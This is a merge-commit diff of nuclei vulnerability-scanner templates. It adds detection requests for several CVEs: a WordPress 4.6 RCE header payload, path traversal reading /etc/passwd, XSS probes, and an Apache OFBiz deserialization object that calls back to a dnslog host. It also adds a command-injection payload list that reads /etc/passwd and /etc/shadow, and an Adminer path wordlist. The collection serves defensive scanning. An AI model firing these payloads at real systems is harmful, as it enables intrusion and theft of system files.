Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates

2021-03-25 12:06:18 +02:00 · 2021-03-25 12:06:18 +02:00 · b84a491478
parent 1107344fab 9b623a72a8
commit b84a491478
31 changed files with 1249 additions and 26 deletions
--- a/README.md
+++ b/README.md
@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc

 | Templates        | Counts                         | Templates       | Counts                          | Templates      | Counts                       |
 | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
-| cves             | 252           | vulnerabilities | 116 | exposed-panels | 108 |
-| takeovers        | 65        | exposures       | 63       | technologies   | 51   |
+| cves             | 258           | vulnerabilities | 117 | exposed-panels | 108 |
+| takeovers        | 65        | exposures       | 64       | technologies   | 51   |
 | misconfiguration | 54 | workflows       | 24         | miscellaneous  | 16  |
 | default-logins   | 20 | exposed-tokens  | 9  | dns            | 8            |
-| fuzzing          | 5          | helpers         | 3         | iot            | 7            |
+| fuzzing          | 7          | helpers         | 6         | iot            | 7            |

-**79 directories, 827 files**.
+**79 directories, 840 files**.

 </td>
 </tr>
--- a/cves/2015/CVE-2015-3337.yaml
+++ b/cves/2015/CVE-2015-3337.yaml
@ -0,0 +1,25 @@
+id: CVE-2015-3337
+
+info:
+ name: Elasticsearch Head plugin LFI
+ author: pdteam
+ severity: high
+ description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2015-3337
+ tags: cve,cve2015,elastic,lfi
+
+requests:
+ - method: GET
+   path:
+    - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"
+
+   matchers-condition: and
+   matchers:
+    - type: regex
+      regex:
+       - "root:[x*]:0:0"
+      part: body
+
+    - type: status
+      status:
+       - 200
--- a/cves/2016/CVE-2016-10033.yaml
+++ b/cves/2016/CVE-2016-10033.yaml
@ -0,0 +1,50 @@
+id: CVE-2016-10033
+info:
+  name: Wordpress 4.6 Remote Code Execution
+  author: princechaddha
+  severity: high
+  reference: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
+  tags: wordpress,cve,cve2016,rce
+
+requests:
+  - raw:
+      - |+
+        GET /?author=1 HTTP/1.1
+        Host: {{Hostname}}
+        Cache-Control: max-age=0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Accept-Language: en-US,en;q=0.9
+        Connection: close
+
+      - |+
+        POST /wp-login.php?action=lostpassword HTTP/1.1
+        Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
+        Connection: close
+        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+        Accept: */*
+        Content-Length: 56
+        Content-Type: application/x-www-form-urlencoded
+
+        wp-submit=Get+New+Password&redirect_to=&user_login={{username}}
+
+    unsafe: true
+    extractors:
+      - type: regex
+        name: username
+        internal: true
+        group: 1
+        part: body
+        regex:
+          - 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>'
+          - 'ocation: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - wp-login.php?checkemail=confirm
+        part: header
+
+      - type: status
+        status:
+          - 302
--- a/cves/2017/CVE-2017-1000170.yaml
+++ b/cves/2017/CVE-2017-1000170.yaml
@ -0,0 +1,26 @@
+id: CVE-2017-1000170
+
+info:
+  name: WordPress Plugin Delightful Downloads Jquery File Tree 2.1.5 Path Traversal
+  author: dwisiswant0
+  severity: high
+  reference: https://www.exploit-db.com/exploits/49693
+  description: jqueryFileTree 2.1.5 and older Directory Traversal
+  tags: cve,cve2017,wordpress,wp-plugin,lfi
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"
+    body: "dir=%2Fetc%2F&onlyFiles=true"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<li class='file ext_passwd'>"
+          - "<a rel='/passwd'>passwd</a></li>"
+        condition: and
+        part: body
+      - type: status
+        status:
+          - 200
--- a/cves/2019/CVE-2019-11869.yaml
+++ b/cves/2019/CVE-2019-11869.yaml
@ -38,8 +38,8 @@ requests:
    matchers:
      - type: dsl
        dsl:
-          - 'contains(body_2, "<script>alert(0);</script>") == true'
+          - 'contains(body_2, "<script>alert(0);</script>")'

      - type: dsl
        dsl:
-          - "contains(tolower(all_headers_2), 'text/html') == true"
+          - "contains(tolower(all_headers_2), 'text/html')"
--- a/cves/2020/CVE-2020-17453.yaml
+++ b/cves/2020/CVE-2020-17453.yaml
@ -0,0 +1,30 @@
+id: CVE-2020-17453
+
+info:
+  name: WSO2 Carbon Management Console - XSS
+  author: madrobot
+  severity: medium
+  description: Reflected XSS vulnerability can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.
+  tags: xss,wso2,cve2020,cve
+  reference: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "'';alert('nuclei')//';"
+        part: body
+
+      - type: word
+        words:
+          - "text/html"
+        part: header
--- a/cves/2020/CVE-2020-17518.yaml
+++ b/cves/2020/CVE-2020-17518.yaml
@ -33,4 +33,4 @@ requests:
    matchers:
      - type: dsl
        dsl:
-          - 'contains(body, "test-poc") == true && status_code == 200' # Using CVE-2020-17519 to confirm this.
+          - 'contains(body, "test-poc") && status_code == 200' # Using CVE-2020-17519 to confirm this.
--- a/cves/2020/CVE-2020-35489.yaml
+++ b/cves/2020/CVE-2020-35489.yaml
@ -0,0 +1,30 @@
+id: CVE-2020-35489
+
+info:
+  name: WordPress Contact Form 7 Plugin - Unrestricted File Upload
+  author: soyelmago
+  severity: critical
+  description: The contact-form-7 (aka Contact Form 7) plugin before 5.3.2 for WordPress allows Unrestricted File Upload and remote code execution because a filename may contain special characters.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35489
+  tags: cve,cve2020,wordpress,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "Contact Form 7"
+        part: body
+
+      - type: regex
+        regex:
+          - '^([0-4]\.|5\.[0-2]\.|5\.3\.[0-1]$)'
+        part: body
--- a/cves/2021/CVE-2021-26295.yaml
+++ b/cves/2021/CVE-2021-26295.yaml
@ -0,0 +1,61 @@
+id: CVE-2021-26295
+info:
+  name: Apache OFBiz RMI deserializes Arbitrary Code Execution
+  author: madrobot
+  severity: critical
+  tags: apache,cve,cve2021,rce,ofbiz
+  description: Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.
+  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295
+
+  # Note:- This is detection template, To perform deserializes do as below
+  # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot
+  # `cat mad.ot | hex` and replace in <cus-obj> along with the url in std-String value
+  # Exploit: https://github.com/yumusb/CVE-2021-26295-POC
+
+requests:
+  - raw:
+      - |
+        POST /webtools/control/SOAPService HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Accept-Language: en
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
+        Connection: close
+        Content-Type: application/xml
+        Content-Length: 910
+
+        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+        <soapenv:Header/>
+        <soapenv:Body>
+        <ser>
+        <map-HashMap>
+        <map-Entry>
+        <map-Key>
+        <cus-obj>bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a</cus-obj>
+        </map-Key>
+        <map-Value>
+        <std-String value="http://t53lq9.dnslog.cn/"></std-String>
+        </map-Value>
+        </map-Entry>
+        </map-HashMap>
+        </ser>
+        </soapenv:Body>
+        </soapenv:Envelope>
+
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "OFBiz.Visitor="
+        part: header
+      - type: word
+        words:
+          - "deserializing"
+          - "errorMessage"
+        part: body
+        condition: and
--- a/exposed-panels/crxde-lite.yaml
+++ b/exposed-panels/crxde-lite.yaml
@ -1,4 +1,4 @@
-id: crxde
+id: crxde-lite

 info:
  name: CRXDE Lite
--- a/exposed-panels/gitlab-detect.yaml
+++ b/exposed-panels/gitlab-detect.yaml
@ -9,14 +9,16 @@ requests:
  - method: GET
    path:
      - "{{BaseURL}}/users/sign_in"
-      - "{{BaseURL}}/users/sign_up"
-      - "{{BaseURL}}/explore"

    redirects: true
    max-redirects: 2
+    matchers-condition: and
    matchers:
      - type: word
        words:
-          - "GitLab"
-          - "Register for GitLab"
-          - "Explore GitLab"
+          - 'GitLab'
+          - 'https://about.gitlab.com'
+
+      - type: status
+        status:
+          - 200
--- a/exposures/apis/openapi.yaml
+++ b/exposures/apis/openapi.yaml
@ -4,6 +4,7 @@ info:
  name: OpenAPI
  author: pdteam
  severity: info
+  tags: api

 requests:
  - method: GET
--- a/exposures/apis/swagger-api.yaml
+++ b/exposures/apis/swagger-api.yaml
@ -1,9 +1,10 @@
 id: swagger-api

 info:
-  name: Swagger API
-  author: pd-team
+  name: Public Swagger API
+  author: pdteam
  severity: info
+  tags: api,swagger

 requests:
  - method: GET
--- a/exposures/apis/wadl-api.yaml
+++ b/exposures/apis/wadl-api.yaml
@ -4,6 +4,7 @@ info:
  name: wadl file disclosure
  author: 0xrudra & manuelbua
  severity: info
+  tags: api

  # References:
  # - https://github.com/dwisiswant0/wadl-dumper
--- a/exposures/apis/wsdl-api.yaml
+++ b/exposures/apis/wsdl-api.yaml
@ -4,6 +4,7 @@ info:
  name: wsdl-detect
  author: jarijaas
  severity: info
+  tags: api

 # This detects web services that have WSDL (https://www.w3.org/TR/wsdl/)
 # For instance, SOAP services, such as: https://docs.microsoft.com/en-us/xamarin/xamarin-forms/data-cloud/web-services/asmx
--- a/exposures/backups/settings-php-files.yaml
+++ b/exposures/backups/settings-php-files.yaml
@ -0,0 +1,29 @@
+id: settings-php-files
+
+info:
+  name: settings.php information disclosure
+  author: sheikhrishad
+  severity: medium
+  tags: backup
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/settings.php.bak"
+      - "{{BaseURL}}/settings.php.dist"
+      - "{{BaseURL}}/settings.php.old"
+      - "{{BaseURL}}/settings.php.save"
+      - "{{BaseURL}}/settings.php.swp"
+      - "{{BaseURL}}/settings.php.txt"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "DB_NAME"
+          - "DB"
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/exposures/backups/sql-dump.yaml
+++ b/exposures/backups/sql-dump.yaml
@ -4,6 +4,7 @@ info:
  name: MySQL Dump Files
  author: geeknik & @dwisiswant0
  severity: medium
+  tags: backup

 requests:
  - method: GET
--- a/exposures/backups/zip-backup-files.yaml
+++ b/exposures/backups/zip-backup-files.yaml
@ -4,6 +4,7 @@ info:
  name: Compressed Web File
  author: Toufik Airane & @dwisiswant0
  severity: medium
+  tags: backup

 requests:
  - method: GET
--- a/exposures/configs/circleci-config.yaml
+++ b/exposures/configs/circleci-config.yaml
@ -17,7 +17,7 @@ requests:
    matchers:
      - type: dsl
        dsl:
-          - 'regex("^version: ", body) && contains(body, "jobs:") == true'
+          - 'regex("^version: ", body) && contains(body, "jobs:")'

      - type: status
        status:
--- a/exposures/configs/composer-config.yaml
+++ b/exposures/configs/composer-config.yaml
@ -17,9 +17,9 @@ requests:
      - type: dsl
        name: composer.lock
        dsl:
-          - "contains(body, 'packages') == true && contains(tolower(all_headers), 'application/octet-stream') == true && status_code == 200"
+          - "contains(body, 'packages') && contains(tolower(all_headers), 'application/octet-stream') && status_code == 200"

      - type: dsl
        name: composer.json
        dsl:
-          - "contains(body, 'require') == true && contains(tolower(all_headers), 'application/json') == true && status_code == 200"
+          - "contains(body, 'require') && contains(tolower(all_headers), 'application/json') && status_code == 200"
--- a/exposures/configs/docker-compose-config.yml
+++ b/exposures/configs/docker-compose-config.yml
@ -22,7 +22,7 @@ requests:
    matchers:
      - type: dsl
        dsl:
-          - 'regex("^version: ", body) && contains(body, "services:") == true'
+          - 'regex("^version: ", body) && contains(body, "services:")'

      - type: status
        status:
--- a/fuzzing/adminer-panel-fuzz.yaml
+++ b/fuzzing/adminer-panel-fuzz.yaml
@ -0,0 +1,46 @@
+id: adminer-panel-fuzz
+info:
+  name: Adminer Login Panel Fuzz
+  author: random-robbie & meme-lord
+  severity: info
+  reference: https://blog.sorcery.ie/posts/adminer/
+  tags: fuzz,adminer
+
+  # <= 4.2.4 can have unauthenticated RCE via SQLite driver
+  # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL
+  # Most versions have some kind of SSRF usability
+  # Is generally handy if you find SQL creds
+
+requests:
+
+  - payloads:
+      path: helpers/wordlists/adminer-paths.txt
+
+    attack: sniper
+    threads: 50
+
+    raw:
+      - |
+        GET {{path}} HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json, text/plain, */*
+        Accept-Language: en-US,en;q=0.5
+        Referer: {{BaseURL}}
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "Login - Adminer"
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '<span class="version">([0-9.]+)'
--- a/fuzzing/header-command-injection.yaml
+++ b/fuzzing/header-command-injection.yaml
@ -0,0 +1,35 @@
+id: header-command-injection
+
+info:
+  name: Header Command Injection
+  author: geeknik
+  severity: high
+  description: Fuzzing headers for command injection
+
+requests:
+  - payloads:
+      header: helpers/payloads/request-headers.txt
+      payload: helpers/payloads/command-injection.txt
+
+    raw:
+      - |
+        GET /?§header§ HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+        §header§: §payload§
+        Connection: close
+
+    attack: clusterbomb
+    redirects: true
+    matchers-condition: or
+    matchers:
+      - type: word
+        words:
+          - "uid="
+          - "gid="
+          - "groups="
+        condition: and
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
--- a/helpers/payloads/command-injection.txt
+++ b/helpers/payloads/command-injection.txt
@ -0,0 +1,75 @@
+&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;
+&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;
+&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
+&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
+/index.html|id|
+;id;
+;id
+;netstat -a;
+;system('cat%20/etc/passwd')
+;id;
+|id
+|/usr/bin/id
+|id|
+|/usr/bin/id|
+||/usr/bin/id|
+|id;
+||/usr/bin/id;
+;id|
+;|/usr/bin/id|
+\n/bin/ls -al\n
+\n/usr/bin/id\n
+\nid\n
+\n/usr/bin/id;
+\nid;
+\n/usr/bin/id|
+\nid|
+;/usr/bin/id\n
+;id\n
+|usr/bin/id\n
+|nid\n
+`id`
+`/usr/bin/id`
+a);id
+a;id
+a);id;
+a;id;
+a);id|
+a;id|
+a)|id
+a|id
+a)|id;
+a|id
+|/bin/ls -al
+a);/usr/bin/id
+a;/usr/bin/id
+a);/usr/bin/id;
+a;/usr/bin/id;
+a);/usr/bin/id|
+a;/usr/bin/id|
+a)|/usr/bin/id
+a|/usr/bin/id
+a)|/usr/bin/id;
+a|/usr/bin/id
+;system('cat%20/etc/passwd')
+;system('id')
+;system('/usr/bin/id')
+%0Acat%20/etc/passwd
+%0A/usr/bin/id
+%0Aid
+%0A/usr/bin/id%0A
+%0Aid%0A
+| id
+& id
+; id
+%0a id %0a
+`id`
+$;/usr/bin/id
+$(`cat /etc/passwd`)
+cat /etc/passwd
+%0Acat%20/etc/passwd
+{{ get_user_file("/etc/passwd") }}
+<!--#exec cmd="/bin/cat /etc/passwd"-->
+<!--#exec cmd="/usr/bin/id;-->
+system('cat /etc/passwd');
+<?php system("cat /etc/passwd");?>
--- a/helpers/payloads/request-headers.txt
+++ b/helpers/payloads/request-headers.txt
@ -0,0 +1,33 @@
+Accept
+Accept-Charset
+Accept-Datetime
+Accept-Encoding
+Accept-Language
+Authorization
+Cache-Control
+Connection
+Content-Length
+Content-MD5
+Content-Type
+Cookie
+Date
+Expect
+Forwarded
+From
+Host
+If-Match
+If-Modified-Since
+If-None-Match
+If-Range
+If-Unmodified-Since
+Max-Forwards
+Origin
+Pragma
+Proxy-Authorization
+Range
+Referer
+TE
+Upgrade
+User-Agent
+Via
+Warning
--- a/helpers/wordlists/adminer-paths.txt
+++ b/helpers/wordlists/adminer-paths.txt
@ -0,0 +1,741 @@
+/_adminer.php
+/adm.php
+/admin/adminer.php
+/adminer-2.0.0.php
+/adminer-2.1.0.php
+/adminer-2.2.0.php
+/adminer-2.2.1.php
+/adminer-2.3.0.php
+/adminer-2.3.2.php
+/adminer-3.0.0.php
+/adminer-3.0.1-en.php
+/adminer-3.0.1-mysql-en.php
+/adminer-3.0.1-mysql.php
+/adminer-3.0.1.php
+/adminer-3.0.1/
+/adminer-3.1.0-en.php
+/adminer-3.1.0-mysql-en.php
+/adminer-3.1.0-mysql.php
+/adminer-3.1.0.php
+/adminer-3.1.0/
+/adminer-3.2.0-en.php
+/adminer-3.2.0-mysql-en.php
+/adminer-3.2.0-mysql.php
+/adminer-3.2.0.php
+/adminer-3.2.0/
+/adminer-3.2.1.php
+/adminer-3.2.2-en.php
+/adminer-3.2.2-mysql-en.php
+/adminer-3.2.2-mysql.php
+/adminer-3.2.2.php
+/adminer-3.2.2/
+/adminer-3.3.0-en.php
+/adminer-3.3.0-mysql-en.php
+/adminer-3.3.0-mysql.php
+/adminer-3.3.0.php
+/adminer-3.3.0/
+/adminer-3.3.1-en.php
+/adminer-3.3.1-mysql-en.php
+/adminer-3.3.1-mysql.php
+/adminer-3.3.1.php
+/adminer-3.3.1/
+/adminer-3.3.2.php
+/adminer-3.3.3-en.php
+/adminer-3.3.3-mysql-en.php
+/adminer-3.3.3-mysql.php
+/adminer-3.3.3.php
+/adminer-3.3.3/
+/adminer-3.3.4-en.php
+/adminer-3.3.4-mysql-en.php
+/adminer-3.3.4-mysql.php
+/adminer-3.3.4.php
+/adminer-3.3.4/
+/adminer-3.4.0-en.php
+/adminer-3.4.0-mysql-en.php
+/adminer-3.4.0-mysql.php
+/adminer-3.4.0.php
+/adminer-3.4.0/
+/adminer-3.5.0.php
+/adminer-3.5.1-en.php
+/adminer-3.5.1-mysql-en.php
+/adminer-3.5.1-mysql.php
+/adminer-3.5.1.php
+/adminer-3.5.1/
+/adminer-3.6.0.php
+/adminer-3.6.1-en.php
+/adminer-3.6.1-mysql-en.php
+/adminer-3.6.1-mysql.php
+/adminer-3.6.1.php
+/adminer-3.6.1/
+/adminer-3.6.2-en.php
+/adminer-3.6.2-mysql-en.php
+/adminer-3.6.2-mysql.php
+/adminer-3.6.2.php
+/adminer-3.6.2/
+/adminer-3.6.3-en.php
+/adminer-3.6.3-mysql-en.php
+/adminer-3.6.3-mysql.php
+/adminer-3.6.3.php
+/adminer-3.6.3/
+/adminer-3.6.4-en.php
+/adminer-3.6.4-mysql-en.php
+/adminer-3.6.4-mysql.php
+/adminer-3.6.4.php
+/adminer-3.6.4/
+/adminer-3.7.0-en.php
+/adminer-3.7.0-mysql-en.php
+/adminer-3.7.0-mysql.php
+/adminer-3.7.0.php
+/adminer-3.7.0/
+/adminer-3.7.1-en.php
+/adminer-3.7.1-mysql-en.php
+/adminer-3.7.1-mysql.php
+/adminer-3.7.1.php
+/adminer-3.7.1/
+/adminer-4.0.0.php
+/adminer-4.0.1-en.php
+/adminer-4.0.1-mysql-en.php
+/adminer-4.0.1-mysql.php
+/adminer-4.0.1.php
+/adminer-4.0.1/
+/adminer-4.0.2-en.php
+/adminer-4.0.2-mysql-en.php
+/adminer-4.0.2-mysql.php
+/adminer-4.0.2.php
+/adminer-4.0.2/
+/adminer-4.0.3-en.php
+/adminer-4.0.3-mysql-en.php
+/adminer-4.0.3-mysql.php
+/adminer-4.0.3.php
+/adminer-4.0.3/
+/adminer-4.1.0-en.php
+/adminer-4.1.0-mysql-en.php
+/adminer-4.1.0-mysql.php
+/adminer-4.1.0.php
+/adminer-4.1.0/
+/adminer-4.2.0-en.php
+/adminer-4.2.0-mysql-en.php
+/adminer-4.2.0-mysql.php
+/adminer-4.2.0.php
+/adminer-4.2.0/
+/adminer-4.2.1-en.php
+/adminer-4.2.1-mysql-en.php
+/adminer-4.2.1-mysql.php
+/adminer-4.2.1.php
+/adminer-4.2.1/
+/adminer-4.2.2-en.php
+/adminer-4.2.2-mysql-en.php
+/adminer-4.2.2-mysql.php
+/adminer-4.2.2.php
+/adminer-4.2.2/
+/adminer-4.2.3-en.php
+/adminer-4.2.3-mysql-en.php
+/adminer-4.2.3-mysql.php
+/adminer-4.2.3.php
+/adminer-4.2.3/
+/adminer-4.2.4-en.php
+/adminer-4.2.4-mysql-en.php
+/adminer-4.2.4-mysql.php
+/adminer-4.2.4.php
+/adminer-4.2.4/
+/adminer-4.2.5-cs.php
+/adminer-4.2.5-de.php
+/adminer-4.2.5-en.php
+/adminer-4.2.5-mysql-cs.php
+/adminer-4.2.5-mysql-de.php
+/adminer-4.2.5-mysql-en.php
+/adminer-4.2.5-mysql-pl.php
+/adminer-4.2.5-mysql-sk.php
+/adminer-4.2.5-mysql.php
+/adminer-4.2.5-pl.php
+/adminer-4.2.5-sk.php
+/adminer-4.2.5.php
+/adminer-4.2.5/
+/adminer-4.3.0-cs.php
+/adminer-4.3.0-de.php
+/adminer-4.3.0-en.php
+/adminer-4.3.0-mysql-cs.php
+/adminer-4.3.0-mysql-de.php
+/adminer-4.3.0-mysql-en.php
+/adminer-4.3.0-mysql-pl.php
+/adminer-4.3.0-mysql-sk.php
+/adminer-4.3.0-mysql.php
+/adminer-4.3.0-pl.php
+/adminer-4.3.0-sk.php
+/adminer-4.3.0.php
+/adminer-4.3.0/
+/adminer-4.3.1-cs.php
+/adminer-4.3.1-de.php
+/adminer-4.3.1-en.php
+/adminer-4.3.1-mysql-cs.php
+/adminer-4.3.1-mysql-de.php
+/adminer-4.3.1-mysql-en.php
+/adminer-4.3.1-mysql-pl.php
+/adminer-4.3.1-mysql-sk.php
+/adminer-4.3.1-mysql.php
+/adminer-4.3.1-pl.php
+/adminer-4.3.1-sk.php
+/adminer-4.3.1.php
+/adminer-4.3.1/
+/adminer-4.4.0-cs.php
+/adminer-4.4.0-de.php
+/adminer-4.4.0-en.php
+/adminer-4.4.0-mysql-cs.php
+/adminer-4.4.0-mysql-de.php
+/adminer-4.4.0-mysql-en.php
+/adminer-4.4.0-mysql-pl.php
+/adminer-4.4.0-mysql-sk.php
+/adminer-4.4.0-mysql.php
+/adminer-4.4.0-pl.php
+/adminer-4.4.0-sk.php
+/adminer-4.4.0.php
+/adminer-4.4.0/
+/adminer-4.5.0-cs.php
+/adminer-4.5.0-de.php
+/adminer-4.5.0-en.php
+/adminer-4.5.0-mysql-cs.php
+/adminer-4.5.0-mysql-de.php
+/adminer-4.5.0-mysql-en.php
+/adminer-4.5.0-mysql-pl.php
+/adminer-4.5.0-mysql-sk.php
+/adminer-4.5.0-mysql.php
+/adminer-4.5.0-pl.php
+/adminer-4.5.0-sk.php
+/adminer-4.5.0.php
+/adminer-4.5.0/
+/adminer-4.6.0-cs.php
+/adminer-4.6.0-de.php
+/adminer-4.6.0-en.php
+/adminer-4.6.0-mysql-cs.php
+/adminer-4.6.0-mysql-de.php
+/adminer-4.6.0-mysql-en.php
+/adminer-4.6.0-mysql-pl.php
+/adminer-4.6.0-mysql-sk.php
+/adminer-4.6.0-mysql.php
+/adminer-4.6.0-pl.php
+/adminer-4.6.0-sk.php
+/adminer-4.6.0.php
+/adminer-4.6.0/
+/adminer-4.6.1-cs.php
+/adminer-4.6.1-de.php
+/adminer-4.6.1-en.php
+/adminer-4.6.1-mysql-cs.php
+/adminer-4.6.1-mysql-de.php
+/adminer-4.6.1-mysql-en.php
+/adminer-4.6.1-mysql-pl.php
+/adminer-4.6.1-mysql-sk.php
+/adminer-4.6.1-mysql.php
+/adminer-4.6.1-pl.php
+/adminer-4.6.1-sk.php
+/adminer-4.6.1.php
+/adminer-4.6.1/
+/adminer-4.6.2-cs.php
+/adminer-4.6.2-de.php
+/adminer-4.6.2-en.php
+/adminer-4.6.2-mysql-cs.php
+/adminer-4.6.2-mysql-de.php
+/adminer-4.6.2-mysql-en.php
+/adminer-4.6.2-mysql-pl.php
+/adminer-4.6.2-mysql-sk.php
+/adminer-4.6.2-mysql.php
+/adminer-4.6.2-pl.php
+/adminer-4.6.2-sk.php
+/adminer-4.6.2.php
+/adminer-4.6.2/
+/adminer-4.6.3-cs.php
+/adminer-4.6.3-de.php
+/adminer-4.6.3-en.php
+/adminer-4.6.3-mysql-cs.php
+/adminer-4.6.3-mysql-de.php
+/adminer-4.6.3-mysql-en.php
+/adminer-4.6.3-mysql-pl.php
+/adminer-4.6.3-mysql-sk.php
+/adminer-4.6.3-mysql.php
+/adminer-4.6.3-pl.php
+/adminer-4.6.3-sk.php
+/adminer-4.6.3.php
+/adminer-4.6.3/
+/adminer-4.7.0-cs.php
+/adminer-4.7.0-de.php
+/adminer-4.7.0-en.php
+/adminer-4.7.0-mysql-cs.php
+/adminer-4.7.0-mysql-de.php
+/adminer-4.7.0-mysql-en.php
+/adminer-4.7.0-mysql-pl.php
+/adminer-4.7.0-mysql-sk.php
+/adminer-4.7.0-mysql.php
+/adminer-4.7.0-pl.php
+/adminer-4.7.0-sk.php
+/adminer-4.7.0.php
+/adminer-4.7.0/
+/adminer-4.7.1-cs.php
+/adminer-4.7.1-de.php
+/adminer-4.7.1-en.php
+/adminer-4.7.1-mysql-cs.php
+/adminer-4.7.1-mysql-de.php
+/adminer-4.7.1-mysql-en.php
+/adminer-4.7.1-mysql-pl.php
+/adminer-4.7.1-mysql-sk.php
+/adminer-4.7.1-mysql.php
+/adminer-4.7.1-pl.php
+/adminer-4.7.1-sk.php
+/adminer-4.7.1.php
+/adminer-4.7.1/
+/adminer-4.7.2-cs.php
+/adminer-4.7.2-de.php
+/adminer-4.7.2-en.php
+/adminer-4.7.2-mysql-cs.php
+/adminer-4.7.2-mysql-de.php
+/adminer-4.7.2-mysql-en.php
+/adminer-4.7.2-mysql-pl.php
+/adminer-4.7.2-mysql-sk.php
+/adminer-4.7.2-mysql.php
+/adminer-4.7.2-pl.php
+/adminer-4.7.2-sk.php
+/adminer-4.7.2.php
+/adminer-4.7.2/
+/adminer-4.7.3-cs.php
+/adminer-4.7.3-de.php
+/adminer-4.7.3-en.php
+/adminer-4.7.3-mysql-cs.php
+/adminer-4.7.3-mysql-de.php
+/adminer-4.7.3-mysql-en.php
+/adminer-4.7.3-mysql-pl.php
+/adminer-4.7.3-mysql-sk.php
+/adminer-4.7.3-mysql.php
+/adminer-4.7.3-pl.php
+/adminer-4.7.3-sk.php
+/adminer-4.7.3.php
+/adminer-4.7.3/
+/adminer-4.7.4-cs.php
+/adminer-4.7.4-de.php
+/adminer-4.7.4-en.php
+/adminer-4.7.4-mysql-cs.php
+/adminer-4.7.4-mysql-de.php
+/adminer-4.7.4-mysql-en.php
+/adminer-4.7.4-mysql-pl.php
+/adminer-4.7.4-mysql-sk.php
+/adminer-4.7.4-mysql.php
+/adminer-4.7.4-pl.php
+/adminer-4.7.4-sk.php
+/adminer-4.7.4.php
+/adminer-4.7.4/
+/adminer-4.7.5-cs.php
+/adminer-4.7.5-de.php
+/adminer-4.7.5-en.php
+/adminer-4.7.5-mysql-cs.php
+/adminer-4.7.5-mysql-de.php
+/adminer-4.7.5-mysql-en.php
+/adminer-4.7.5-mysql-pl.php
+/adminer-4.7.5-mysql-sk.php
+/adminer-4.7.5-mysql.php
+/adminer-4.7.5-pl.php
+/adminer-4.7.5-sk.php
+/adminer-4.7.5.php
+/adminer-4.7.5/
+/adminer-4.7.6-cs.php
+/adminer-4.7.6-de.php
+/adminer-4.7.6-en.php
+/adminer-4.7.6-mysql-cs.php
+/adminer-4.7.6-mysql-de.php
+/adminer-4.7.6-mysql-en.php
